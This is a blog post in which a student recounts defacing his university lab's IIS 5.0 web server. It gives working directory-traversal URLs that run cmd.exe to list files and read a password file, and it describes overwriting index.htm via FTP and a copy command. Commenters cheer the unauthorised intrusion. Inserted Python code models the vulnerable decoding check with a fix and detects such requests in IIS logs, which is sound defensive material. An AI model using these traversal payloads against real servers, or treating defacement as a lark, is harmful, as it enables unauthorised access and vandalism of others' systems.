Beng Hacks: Hit and Run

Tuesday, December 21, 2004

Hit and Run

OK, here's what happened. The first thing hackers always do is enumerate: find out what the target is all about. I knew the server was running a web server and an FTP server, so I grabbed the banners. These are the important things I found out:

220 chan-lanlab2 Microsoft FTP Service (Version 5.0).

and

Server: Microsoft-IIS/5.0
Date: Tue, 15 Dec 2004 03:12:52 GMT
Content-Type: text/html
Content-Length: 87

So, the server was running Windows NT and/or 2000, or so I guessed =]. There was no way for me to tell what service pack the server was running, so I had no choice but trial and error. I tried a unicode hack:

http://chan-lanlab2/..%255c../winnt/system32/cmd.exe?/c+dir

a well-known hack in which IIS decodes the URL twice. After the first decoding, "%255c" has only become "%5c", so the directory-traversal check sees "..%5c.." as an ordinary (nonexistent) folder name inside the web root and lets the request through. IIS then decodes the path a second time before mapping it to disk, turning "%5c" into "\" and the request into a real "..\.." traversal. (Strictly, the %255c form is the double-decoding variant of this family of bugs; the original "Unicode" one used overlong UTF-8 such as %c0%af for the slash.) If the website was hosted in the default location, i.e. C:\Inetpub\wwwroot\, this URL effectively executes C:\winnt\system32\cmd.exe with the command dir, listing the current folder, which would be the website's folder.
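To make the check-then-decode ordering concrete, here is a small model of the vulnerable handler next to a fixed one. This is an added example, not code from the original post or from IIS: it models only the URL path (not the ?/c+dir query), uses the C:\Lab02 web root shown in the post's directory listing, and imitates the behaviour in pure Python with ntpath so it runs on any OS.

```python
"""Model of the double-decoding path check abused above (added example,
not IIS code). Only the URL path is modelled; the web root is the one
from the post's "Directory of C:\Lab02" listing."""
import ntpath
from urllib.parse import unquote

WEBROOT = r"C:\Lab02"  # web root taken from the post's dir listing


def map_to_disk(decoded_path: str) -> str:
    """Join a URL path onto the web root and canonicalize it Windows-style
    (ntpath collapses '..' segments and turns '/' into '\\')."""
    return ntpath.normpath(ntpath.join(WEBROOT, decoded_path.lstrip("/")))


def inside_webroot(disk_path: str) -> bool:
    """True if the canonical path is the web root or lies beneath it."""
    root = ntpath.normcase(WEBROOT) + "\\"
    return ntpath.normcase(disk_path + "\\").startswith(root)


def vulnerable_handler(raw_url_path: str) -> str:
    """Vulnerable order of operations: decode once, run the traversal check,
    then decode AGAIN before mapping to disk. '%255c' survives the first
    decode as '%5c' (an ordinary directory name, so the check passes) and
    only becomes '\\' in the second decode, after the check has run."""
    once = unquote(raw_url_path)
    if not inside_webroot(map_to_disk(once)):
        return "403 Forbidden"
    twice = unquote(once)       # the bug: a second decode after the check
    return map_to_disk(twice)   # the path the file system actually gets


def hardened_handler(raw_url_path: str) -> str:
    """Fixed order: decode exactly once and run the check on the very same
    string that is mapped to disk, so check and use cannot diverge. The
    double-encoded request now maps to a nonexistent file under the root."""
    decoded = unquote(raw_url_path)
    disk = map_to_disk(decoded)
    if not inside_webroot(disk):
        return "403 Forbidden"
    return disk


if __name__ == "__main__":
    for url in ("/index.htm",
                "/..%5c../winnt/system32/cmd.exe",      # single-encoded: caught
                "/..%255c../winnt/system32/cmd.exe"):   # double-encoded: escapes
        print(f"{url:38} vulnerable -> {vulnerable_handler(url)}")
        print(f"{'':38} hardened   -> {hardened_handler(url)}")
```

The single-encoded form (%5c) is rejected by both handlers, which is why the post's author had to go to %255c: the extra layer of encoding is exactly what lets the path slip between the check and the use.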

And... voila!

Directory of C:\Lab02
...
05/11/2004 02:58p 4,786 index.htm
11/29/2004 05:17p <DIR> Lab
12/16/2004 06:07p 1,337 printenv.cgi
06/24/2004 01:20p 33 pwd
11/29/2004 02:20p <DIR> Temp
11/29/2004 02:20p <DIR> Tute
06/24/2004 01:29p 1,295 upload.cgi
06/24/2004 01:17p 945 upload.htm
...

With cmd.exe access I could execute any DOS command I wanted, straight from the browser! Whoa! A pwd file! I quickly put this into the URL:

http://chan-lanlab2/..%255c../winnt/system32/cmd.exe?/c+type+pwd

which types out the contents of the pwd file, and got:

v¦ªx£e>(¦mí±a@>D ?¦+?O+pKê?W¦¦µ`4

Shit, some encrypted username and password. Viewing the upload.cgi file, dunno what language, but it seemed to be using AES, so I don't think I can brute-force this. Sianz, thought I could use his upload form to put my stuff inside. Then it hit me: maybe the FTP server (you know lah, we can upload our assignments there) puts the files somewhere in this folder? Listing the Temp folder confirmed my guess! It contained folders for all the PC # accounts:

Directory of C:\Lab02\Temp
...
11/29/2004 02:21p PC01
11/29/2004 02:21p PC02
...


So... I quickly FTP'ed a modified copy of the index.htm (with the Hacks logo img tag lah) and hacks.gif from my PC in the lab (PC11). Issuing a copy command through the same cmd.exe URL in the browser, I copied the files from the PC11 folder over to C:\Lab02 and overwrote the original index.htm!!! Success!!
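Every step of this chain (dir, type pwd, copy) went through the web server, so it leaves a trail in the IIS log. The detector below is an added example, not part of the original post: it parses a W3C extended log, fully decodes each URL stem (so raw, once-decoded and double-encoded entries all compare the same way) and flags traversal or cmd.exe requests. The log excerpt is constructed to mirror the post's requests; the IP addresses, timestamps, the exact copy command and the %c0%af line are assumptions, not data from the post.

```python
"""Detect cmd.exe-through-the-URL requests in an IIS W3C extended log
(added example, not from the original post; log lines are constructed)."""
from urllib.parse import unquote

# Constructed excerpt in the default IIS 5.0 W3C field order. Addresses,
# times, the copy command and the %c0%af request are made up for illustration.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2004-12-15 03:12:52
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2004-12-15 03:12:52 10.10.11.11 - 10.10.11.2 80 GET /index.htm - 200 Mozilla/4.0
2004-12-15 03:13:05 10.10.11.11 - 10.10.11.2 80 GET /..%255c../winnt/system32/cmd.exe /c+dir 200 Mozilla/4.0
2004-12-15 03:14:41 10.10.11.11 - 10.10.11.2 80 GET /..%255c../winnt/system32/cmd.exe /c+type+pwd 200 Mozilla/4.0
2004-12-15 03:20:10 10.10.11.11 - 10.10.11.2 80 GET /..%255c../winnt/system32/cmd.exe /c+copy+Temp\\PC11\\index.htm+index.htm 200 Mozilla/4.0
2004-12-15 03:22:00 10.10.11.11 - 10.10.11.2 80 GET /..%c0%af../winnt/system32/cmd.exe /c+dir 200 Mozilla/4.0
2004-12-15 03:25:33 10.10.11.12 - 10.10.11.2 80 GET /Lab/notes.htm - 200 Mozilla/4.0
"""

# Overlong UTF-8 spellings of '/' and '\' that IIS 5.0 accepted (the original
# "Unicode" bug). urllib cannot decode them, so they are mapped explicitly.
OVERLONG = {"%c0%af": "/", "%c1%9c": "\\", "%c1%1c": "\\"}


def normalize_stem(stem: str) -> str:
    """Decode the URL stem until it stops changing and unify separators."""
    s = stem.lower()
    for enc, sep in OVERLONG.items():
        s = s.replace(enc, sep)
    for _ in range(5):            # bounded: stop at a fixed point
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s.replace("\\", "/")


def is_suspicious(stem: str) -> bool:
    """Traversal out of the web root, or any reach for cmd.exe / system32."""
    n = normalize_stem(stem)
    return "../" in n or n.endswith("/cmd.exe") or "/system32/" in n


def parse_w3c(text: str):
    """Yield one dict per record, keyed by the names in the #Fields: line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def find_traversal(log_text: str) -> list[dict]:
    """Return the flagged requests with the decoded path and the command run."""
    hits = []
    for rec in parse_w3c(log_text):
        stem = rec.get("cs-uri-stem", "")
        if is_suspicious(stem):
            hits.append({"time": rec["date"] + " " + rec["time"],
                         "client": rec["c-ip"],
                         "stem": normalize_stem(stem),
                         "command": rec["cs-uri-query"].replace("+", " ")})
    return hits


if __name__ == "__main__":
    for hit in find_traversal(SAMPLE_LOG):
        print(hit["time"], hit["client"], hit["stem"], hit["command"])
```

Note that a 200 status on these lines is the tell: on a patched server the same requests would return 404 or 403, so grouping flagged stems by status and client IP separates probing from a working shell.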

Cookie for me? =]

2 Comments:

Blogger Beng Hacks said...

Well done lah! Too bad I'm not in the lab now, can't see the page LOL!! You got take screenshot anot?

6:18 PM  
Blogger trinity374 said...

Got! But using mobile leh. Next time show you lor, coz I changed the index page back to orig liao. Leave it there too long, later I kena then jialat!

6:22 PM  
